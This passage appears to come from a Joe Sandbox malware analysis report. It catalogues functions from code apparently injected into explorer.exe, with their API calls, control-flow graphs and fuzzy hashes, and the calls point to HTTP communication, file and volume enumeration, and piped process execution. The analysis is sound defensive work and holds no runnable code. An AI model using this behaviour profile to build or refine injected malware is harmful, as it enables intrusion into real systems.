                                                                                                                                                                                                                                                  • Opcode ID: 74120f94081957b39dcb7d11c364901f8914ee27a4b2dd0b4ec9089b68c6a037
                                                                                                                                                                                                                                                  • Instruction ID: d89164670b806888ff076733248ad684e645450ec00664ee4b863c09f4c59542
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74120f94081957b39dcb7d11c364901f8914ee27a4b2dd0b4ec9089b68c6a037
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DF0C972224A8792EB60DF10E8503B96330FB90748FC01132A14D42DA9EF2CC70EEB40
                                                                                                                                                                                                                                                  Function 00F2A8E0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 179 f2a8e0-f2a8fb call f28cf0 182 f2a904-f2a918 call f2b4cc 179->182 183 f2a8fd-f2a8ff 179->183 187 f2a926-f2a92b 182->187 188 f2a91a-f2a924 182->188 184 f2aa04-f2aa0b 183->184 189 f2a930-f2a941 call f2bf78 187->189 188->189 192 f2a943-f2a945 189->192 193 f2a94a-f2a983 call f2b470 FindFirstFileW 189->193 192->184 196 f2a9f5-f2a9ff call f282b4 193->196 197 f2a985-f2a98a 193->197 196->184 197->196 199 f2a98c-f2a9a1 FindNextFileW 197->199 201 f2a9a3 199->201 202 f2a9a5-f2a9ab 199->202 201->196 203 f2a9af-f2a9dc call f2c144 call f27430 202->203 204 f2a9ad 202->204 209 f2a9f3 203->209 210 f2a9de-f2a9f1 LoadLibraryW 203->210 204->196 209->197 210->196
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectorySystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2188284642-0
                                                                                                                                                                                                                                                  • Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                                                                                  • Instruction ID: 2f4663a46429189a6e6a0a04b0c9e52e901a31493c57d413fd38012b0c8e09c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C312132519A91D7D730DB25F88436AB360F784364F500326E6AE82AA9EF3CC585EB01
                                                                                                                                                                                                                                                  Function 00F2B388 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 221 f2b388-f2b3c6 NtAllocateVirtualMemory 222 f2b3d7-f2b3e0 221->222 223 f2b3c8-f2b3d2 call f2b470 221->223 223->222
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 2167126740-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                                                                                  • Instruction ID: e53d21ca8efad93f051cc1016cd87480fbc0bd22eec74c60afbd419edf2f81a2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68E0A5B2228A84C2D650AF65E45470AB760F7847B8F805305BAA946BD8CBBCC108CB00
                                                                                                                                                                                                                                                  Function 00F25078 Relevance: 1.6, APIs: 1, Instructions: 57filenetworkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 243 f25078-f250ba 244 f250bc-f250dc InternetReadFile 243->244 245 f250de-f250e3 244->245 246 f2514f 244->246 245->246 247 f250e5-f25102 call f2b704 245->247 248 f25154-f2515c 246->248 251 f25104-f25106 247->251 252 f25108-f2514a call f2b3e4 247->252 251->248 252->244
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileInternetRead
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 778332206-0
                                                                                                                                                                                                                                                  • Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                                                                                  • Instruction ID: c3b5c1178a2667327e7644965e7233827116f1065179fc3ee0e26e8c6447b9bc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9021E8323296859BDB60CA15E4507AAB3E1F3CCB84F404125EA8E83B58EB7DCA54DF00
                                                                                                                                                                                                                                                  Function 00F282B4 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 259 f282b4-f282cc 260 f282ce-f282eb NtFreeVirtualMemory 259->260 261 f282ef-f282f3 259->261 260->261
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeMemoryVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3963845541-0
                                                                                                                                                                                                                                                  • Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                                                                                  • Instruction ID: b332309e400adc7c4ffc4a529d15153d14f7518f9e0aa84a39d2bcb0bc069760
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5E0EC72508A8182D7309B60F4043897760F3853B8F944316EAF812AE8CF7CC28ACB04
                                                                                                                                                                                                                                                  Function 00F2C704 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 262 f2c704-f2c730 NtDelayExecution
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DelayExecution
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1249177460-0
                                                                                                                                                                                                                                                  • Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                                                                                  • Instruction ID: 37379660f60da53ff20f29e0119dae48b9db6e12f581e911281bd70f022614d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6ED0C77260468187CB245B14E44521E7760F795344FD0452AE68D45754DE3CC265CF04
                                                                                                                                                                                                                                                  Function 00F241B4 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                                                                                                                  • Instruction ID: a4c0dcecdcd4574523fe9f4d5edbbd2df4c06bb75d8bbd85fb02975159f0068f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23316C31618B52C2E720EBB5FC5432A7260FB84375F501225F96A86AE5DFBCD904F701
                                                                                                                                                                                                                                                  Function 00F25160 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 107 f25160-f251c7 call f2b388 call f2b4cc 112 f251d8-f251e0 107->112 113 f251c9-f251d6 107->113 114 f251e5-f2520d call f2be64 112->114 113->114 117 f25265-f25275 114->117 118 f2520f-f25226 call f2b4cc 114->118 119 f25277-f25280 117->119 120 f25284-f2528c 117->120 127 f25237-f2523f 118->127 128 f25228-f25235 118->128 119->120 122 f25292-f252a9 call f2b4cc 120->122 123 f25315-f2532c call f2b4cc 120->123 135 f252ba-f252c2 122->135 136 f252ab-f252b8 122->136 132 f25340-f25348 123->132 133 f2532e-f2533e 123->133 130 f25244-f2525b call f2be64 127->130 128->130 130->117 141 f25260 call f2be64 130->141 138 f25350-f25397 HttpOpenRequestA 132->138 133->138 137 f252c7-f25310 HttpOpenRequestA 135->137 136->137 140 f2539c-f253a2 137->140 138->140 142 f253a4 140->142 143 f253a9-f253b1 140->143 141->117 144 f25467-f2546d 142->144 145 f253b3-f253d0 InternetSetOptionA 143->145 146 f253d6-f253de 143->146 147 f25479 144->147 148 f2546f-f25474 call f282b4 144->148 145->146 149 f253e0-f25422 call f2c0fc * 2 HttpSendRequestA 146->149 150 f25424-f2543f HttpSendRequestA 146->150 152 f2547b-f25482 147->152 148->147 154 f25443-f25448 149->154 150->154 156 f2544a 154->156 157 f2544c-f2545b call f282b4 154->157 156->144 157->144 157->152
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET ref: 00F25305
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET ref: 00F25391
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET ref: 00F253D0
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 00F25418
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 00F25439
                                                                                                                                                                                                                                                    • Part of subcall function 00F282B4: NtFreeVirtualMemory.NTDLL ref: 00F282E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2140924187-0
                                                                                                                                                                                                                                                  • Opcode ID: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                                                                                                                  • Instruction ID: a92dc02424322cf1c149d48ecc8e72df7445166695974ce8d35cdf59c1abc7f9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF71D032209FD5C6EB60DB14F49439AB7A0F788B94F640126EAC942B69DF7DC588DF40
                                                                                                                                                                                                                                                  Function 00F28C30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 211 f28c30-f28c7b call f2b470 * 2 FindFirstVolumeW 216 f28c81-f28cd8 GetVolumeInformationW FindVolumeClose 211->216 217 f28c7d-f28c7f 211->217 219 f28ce3 216->219 220 f28cda-f28ce1 216->220 218 f28ce5-f28cec 217->218 219->218 220->218
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindFirstVolumeW.KERNEL32 ref: 00F28C6A
                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32 ref: 00F28CBE
                                                                                                                                                                                                                                                  • FindVolumeClose.KERNEL32 ref: 00F28CCD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 586543143-0
                                                                                                                                                                                                                                                  • Opcode ID: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                                                                                                                  • Instruction ID: 8d4dd2b34bad736ebbfb273e53d7c57bc6d0806f4150a3b368ee51014f0c13b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE11E872619A40D6D760DF10F48439BB3B0F785360F900636E6AA42BA8DF7CC94AEB40
                                                                                                                                                                                                                                                  Function 00F28A58 Relevance: 1.6, APIs: 1, Instructions: 94libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 225 f28a58-f28a70 226 f28a72-f28a74 225->226 227 f28a79-f28acc 225->227 228 f28bd4-f28bd8 226->228 229 f28ad8-f28ae4 227->229 230 f28bd2 229->230 231 f28aea-f28b41 call f2c0fc call f27430 229->231 230->228 236 f28b47-f28b4d 231->236 237 f28bcd 231->237 236->237 238 f28b4f-f28b57 236->238 237->229 238->237 240 f28b59-f28b61 238->240 241 f28b63-f28b73 GetProcAddress GetProcAddressForCaller 240->241 242 f28b75-f28bcb 240->242 241->242 242->228
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 190572456-0
                                                                                                                                                                                                                                                  • Opcode ID: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                                                                                                                  • Instruction ID: b65af3ec3a189e27ef472109fb55e7960a4d06d6b99164679eef8621fe10928d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54418876619A848BCB64CB19E49072AB7A0F7C8B94F504526EBCE83B28DF3CD551DF00
                                                                                                                                                                                                                                                  Function 00F26C6C Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 255 f26c6c-f26ca1 CreateThread 256 f26ca3-f26ca8 255->256 257 f26caa 255->257 258 f26cac-f26cb0 256->258 257->258
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                                  • Opcode ID: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                                                                                                                  • Instruction ID: 68043494c7f886b8d8bbf9a0837d327cfd9dd1f4e3b5eac2ad42375df297abbf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE04F72624B80C5D764DF20F48935A77A0F3C4394F905026E58B86F28CF3CC185DB00

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00F22164 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32 ref: 00F22233
                                                                                                                                                                                                                                                  • SetHandleInformation.KERNEL32 ref: 00F2224D
                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32 ref: 00F2226E
                                                                                                                                                                                                                                                  • SetHandleInformation.KERNEL32 ref: 00F22288
                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32 ref: 00F222A9
                                                                                                                                                                                                                                                  • SetHandleInformation.KERNEL32 ref: 00F222C3
                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 00F22385
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • PeekNamedPipe.KERNEL32 ref: 00F22434
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32 ref: 00F22490
                                                                                                                                                                                                                                                  • PeekNamedPipe.KERNEL32 ref: 00F224E4
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32 ref: 00F22540
                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 00F22579
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32 ref: 00F225AA
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F225B8
                                                                                                                                                                                                                                                    • Part of subcall function 00F2C704: NtDelayExecution.NTDLL ref: 00F2C726
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F225C6
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F225D4
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F225E2
                                                                                                                                                                                                                                                    • Part of subcall function 00F282B4: NtFreeVirtualMemory.NTDLL ref: 00F282E5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                                                                                                                                  • String ID: h
                                                                                                                                                                                                                                                  • API String ID: 30365702-2439710439
                                                                                                                                                                                                                                                  • Opcode ID: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                                                                                                                                  • Instruction ID: 64cc895fb81b523379df27f36a8a3e6a7a1bdd70d7e28a3fda902025e1dfd97d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61C1CF32208BC18AE7A0DB65F49479BB7A1F3C4754F508126EA8983E68DFBDC548DF40
                                                                                                                                                                                                                                                  Function 00F280B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFileInitStringUnicode
                                                                                                                                                                                                                                                  • String ID: 0$@
                                                                                                                                                                                                                                                  • API String ID: 2498367268-1545510068
                                                                                                                                                                                                                                                  • Opcode ID: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                                                                                                                                  • Instruction ID: 872f48a21b641a0529b0687b547e20a820bb5cd2e34779f336f2924d3b508ce4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8221AF721197848AE760DF14F49478BBBA4F384398F90821AE6D947AA8CB7DD589CF40
                                                                                                                                                                                                                                                  Function 00F22B28 Relevance: 6.1, APIs: 4, Instructions: 112fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32 ref: 00F22BE7
                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00F22CAD
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32 ref: 00F22CDA
                                                                                                                                                                                                                                                  • FindClose.KERNEL32 ref: 00F22CED
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 65906682-0
                                                                                                                                                                                                                                                  • Opcode ID: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                                                                                                                                  • Instruction ID: ca8713e780c45ea2b071d9b18bbfde2454596fb14e18d6af09c16a5933209568
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63515132219F95A2DB60DB04F4903AEB371F7C43A4F904526EA8E43A69EF7CC645DB00
                                                                                                                                                                                                                                                  Function 00F300E8 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 86f54137455ab80dbdbc12a7fc5e923267ad55422e72ceee1d8b8b56c2c8de9b
                                                                                                                                                                                                                                                  • Instruction ID: 4188e462aeb3cd56126b3419069c972b71855382847cf7a4ecee41d36a83fd5f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86f54137455ab80dbdbc12a7fc5e923267ad55422e72ceee1d8b8b56c2c8de9b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FD012DBD4DAC446E9175A344C7E38D2F10E776D71F4980CBD7D406783AC48580AB316
                                                                                                                                                                                                                                                  Function 00F30610 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ed80cfed0847e0f73f19d8a46af97e746bea18a48b2517016e1c88c6c229a98d
                                                                                                                                                                                                                                                  • Instruction ID: bd6ccbdf3f14cd19176cea9a809e83ef04c83b8cfd05d0e2cf94957b911ad0a1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed80cfed0847e0f73f19d8a46af97e746bea18a48b2517016e1c88c6c229a98d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F90025210F3D105C7034E74492150C3F30618281034D5097828882183C448049CA317
                                                                                                                                                                                                                                                  Function 00F2C860 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
